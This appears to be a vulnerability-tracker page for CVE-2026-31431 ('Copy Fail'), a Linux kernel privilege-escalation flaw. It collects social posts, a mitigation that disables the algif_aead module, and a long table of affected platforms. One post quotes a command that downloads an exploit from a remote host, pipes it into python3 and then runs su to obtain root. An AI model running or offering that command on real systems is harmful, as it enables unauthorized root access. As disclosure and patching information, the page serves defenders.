    The authors released YARA and Sigma detection rules for CVE-2026-31431, linking to YARA rules that detect public PoC artifacts, payloads, and exploit snippets, signifying publicly available PoC material.

    91482536315113.5K
    221.4K followersView on X
  • 奶昔🥤@realNyarime
    Exploit

    看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限: curl https://copy.fail/exp | python3 && su CVE-2026-31431 建议尽快更新系统,事态紧急可以先打个补丁 echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf rmmod algif_aead 2>/dev/null 详细参考👉 https://xint.io/blog/copy-fail-linux-distributions

    Post summary

    The post reveals a live exploit for CVE-2026-31431 that enables privilege escalation on all Linux distributions, provides an immediate workaround, and urges users to patch promptly.

    28708421440146.7K
    40.1K followersView on X
  • Brian Pak@brian_pak
    General

    Hey everyone. We’ve seen the discussions around Copy Fail (CVE-2026-31431) and the disclosure process. We appreciate the passion from distro maintainers, defenders, and the broader Linux community. This is a serious issue, and we want to share some context on our side in good faith. 🧵

    Post summary

    The post acknowledges CVE-2026-31431 and expresses intent to share context, but it offers no technical details, exploitation evidence, or mitigation information.

    168210535211107.4K
    3.6K followersView on X
CPE platform detail204 entries

204 of 204 entries

PartVendorProductVersionTarget SWTarget HW
OSamazonamazon_linux---
Apparistacloudvision_agni---
Apparistacloudvision_portal---
OSaristanetvisor_os---
OSaristanetvisor_os7.1.0--
OSaristanetvisor_os7.1.0--
Apparistavelocloud_edge---
Apparistavelocloud_gateway---
Apparistavelocloud_orchestrator---
OScanonicalubuntu_linux---
OScanonicalubuntu_linux14.04--
OScanonicalubuntu_linux16.04--
OScanonicalubuntu_linux18.04--
OScanonicalubuntu_linux20.04--
OScanonicalubuntu_linux22.04--
OScanonicalubuntu_linux24.04--
OScanonicalubuntu_linux25.10--
OSdebiandebian_linux11.0--
OSdebiandebian_linux12.0--
OSdebiandebian_linux13.0--
OSlinuxlinux_kernel---
OSlinuxlinux_kernel7.0--
OSlinuxlinux_kernel7.0--
OSlinuxlinux_kernel7.0--
OSlinuxlinux_kernel7.0--
OSlinuxlinux_kernel7.0--
OSlinuxlinux_kernel7.0--
OSnixosnixos---
OSopensuseleap15.3--
OSopensuseleap15.4--
OSopensuseleap15.5--
OSopensuseleap15.6--
OSredhatenterprise_linux10.0--
OSredhatenterprise_linux8.0--
OSredhatenterprise_linux9.0--
OSredhatenterprise_linux_aus8.4--
OSredhatenterprise_linux_aus8.6--
OSredhatenterprise_linux_eus10.0--
OSredhatenterprise_linux_eus8.4--
OSredhatenterprise_linux_eus9.4--
OSredhatenterprise_linux_eus9.6--
OSredhatenterprise_linux_tus8.6--
OSredhatenterprise_linux_tus8.8--
OSredhatenterprise_linux_update_services_for_sap_solutions8.6--
OSredhatenterprise_linux_update_services_for_sap_solutions8.8--
OSredhatenterprise_linux_update_services_for_sap_solutions9.0--
OSredhatenterprise_linux_update_services_for_sap_solutions9.2--
Appredhatopenshift_container_platform---
Appredhatopenshift_container_platform4.0--
Appsiemenssimatic_ax_runtime---
HWsiemenssimatic_cn_4100---
OSsiemenssimatic_cn_4100_firmware---
HWsiemenssimatic_hmi_mtp1000---
HWsiemenssimatic_hmi_mtp1200---
HWsiemenssimatic_hmi_mtp1500---
HWsiemenssimatic_hmi_mtp1900---
HWsiemenssimatic_hmi_mtp2200---
HWsiemenssimatic_hmi_mtp700---
OSsiemenssimatic_hmi_unified_comfort_panels_firmware---
OSsiemenssimatic_hmi_unified_comfort_panels_firmware21.0--
OSsiemenssimatic_hmi_unified_comfort_panels_firmware21.0--
OSsiemenssimatic_hmi_unified_comfort_panels_firmware21.0--
HWsiemenssimatic_iot2050_advanced---
OSsiemenssimatic_iot2050_advanced_firmware---
OSsiemenssimatic_ipc_ied-os---
HWsiemenssimatic_s7-1500_cpu_1518-4_pn\/dp_mfp---
OSsiemenssimatic_s7-1500_cpu_1518-4_pn\/dp_mfp_firmware---
HWsiemenssimatic_s7-1500_cpu_1518f-4_pn\/dp_mfp---
OSsiemenssimatic_s7-1500_cpu_1518f-4_pn\/dp_mfp_firmware---
HWsiemenssimatic_s7-1500_tm_mfp---
OSsiemenssimatic_s7-1500_tm_mfp_firmware---
HWsiemenssiplus_s7-1500_cpu_1518-4_pn\/dp_mfp---
OSsiemenssiplus_s7-1500_cpu_1518-4_pn\/dp_mfp_firmware---
OSsusebasesystem_module15suse_linux_enterprise-
OSsusebasesystem_module15suse_linux_enterprise-
OSsusebasesystem_module15suse_linux_enterprise-
OSsusebasesystem_module15suse_linux_enterprise-
OSsusebasesystem_module15suse_linux_enterprise-
OSsusebasesystem_module15suse_linux_enterprise-
OSsusebasesystem_module15suse_linux_enterprise-
Appsusecaas_platform4.0--
OSsusedevelopment_tools_module15suse_linux_enterprise-
OSsusedevelopment_tools_module15suse_linux_enterprise-
OSsusedevelopment_tools_module15suse_linux_enterprise-
OSsusedevelopment_tools_module15suse_linux_enterprise-
OSsusedevelopment_tools_module15suse_linux_enterprise-
OSsusedevelopment_tools_module15suse_linux_enterprise-
OSsusedevelopment_tools_module15suse_linux_enterprise-
Appsuseenterprise_storage6.0--
Appsuseenterprise_storage7.0--
Appsuseenterprise_storage7.1--
OSsuselegacy_module15suse_linux_enterprise-
OSsuselinux_enterprise_desktop11--
OSsuselinux_enterprise_desktop12--
OSsuselinux_enterprise_desktop15--
OSsuselinux_enterprise_desktop15--
OSsuselinux_enterprise_desktop15--
OSsuselinux_enterprise_desktop15--
OSsuselinux_enterprise_desktop15--
OSsuselinux_enterprise_desktop15--
OSsuselinux_enterprise_desktop15--
OSsuselinux_enterprise_high_availability_extension15--
OSsuselinux_enterprise_high_availability_extension15--
OSsuselinux_enterprise_high_availability_extension15--
OSsuselinux_enterprise_high_availability_extension16.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_high_performance_computing15.0--
OSsuselinux_enterprise_live_patching12--
OSsuselinux_enterprise_live_patching15--
OSsuselinux_enterprise_live_patching15--
OSsuselinux_enterprise_live_patching15--
OSsuselinux_enterprise_live_patching15--
OSsuselinux_enterprise_micro5.0--
OSsuselinux_enterprise_micro5.1--
OSsuselinux_enterprise_micro5.2--
OSsuselinux_enterprise_micro5.2rancher-
OSsuselinux_enterprise_micro5.3--
OSsuselinux_enterprise_micro5.3rancher-
OSsuselinux_enterprise_micro5.4--
OSsuselinux_enterprise_micro5.4rancher-
OSsuselinux_enterprise_micro5.5--
OSsuselinux_enterprise_real_time15.0--
OSsuselinux_enterprise_real_time15.0--
OSsuselinux_enterprise_real_time15.0--
OSsuselinux_enterprise_real_time15.0--
OSsuselinux_enterprise_real_time15.0--
OSsuselinux_enterprise_real_time15.0--
OSsuselinux_enterprise_server11--
OSsuselinux_enterprise_server11--
OSsuselinux_enterprise_server11--
OSsuselinux_enterprise_server12--
OSsuselinux_enterprise_server12sap-
OSsuselinux_enterprise_server12--
OSsuselinux_enterprise_server12--
OSsuselinux_enterprise_server12--
OSsuselinux_enterprise_server12--
OSsuselinux_enterprise_server12--
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15sap-
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15sap-
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15sap-
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15sap-
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15sap-
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15sap-
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15--
OSsuselinux_enterprise_server15sap-
OSsuselinux_enterprise_server16.0--
OSsuselinux_enterprise_server16.0sap-
OSsuselinux_enterprise_server16.1--
OSsuselinux_enterprise_server16.1sap-
OSsuselinux_enterprise_workstation_extension15--
OSsuselinux_micro6.0--
OSsuselinux_micro6.1--
OSsuselinux_micro6.2--
Appsusemanager_proxy4.0--
Appsusemanager_proxy4.1--
Appsusemanager_proxy4.2--
Appsusemanager_proxy4.3--
Appsusemanager_retail_branch_server4.0--
Appsusemanager_retail_branch_server4.1--
Appsusemanager_retail_branch_server4.2--
Appsusemanager_retail_branch_server4.3--
Appsusemanager_server4.0--
Appsusemanager_server4.1--
Appsusemanager_server4.2--
Appsusemanager_server4.3--
Appsuseopenstack_cloud9.0--
Appsuseopenstack_cloud_crowbar9.0--
OSsusepublic_cloud_module15suse_linux_enterprise-
OSsusepublic_cloud_module15suse_linux_enterprise-
OSsuserealtime_module15suse_linux_enterprise-
OSsuserealtime_module15suse_linux_enterprise-
OSsuserealtime_module15suse_linux_enterprise-
OSsuserealtime_module15suse_linux_enterprise-
OSsuserealtime_module15suse_linux_enterprise-

Explore more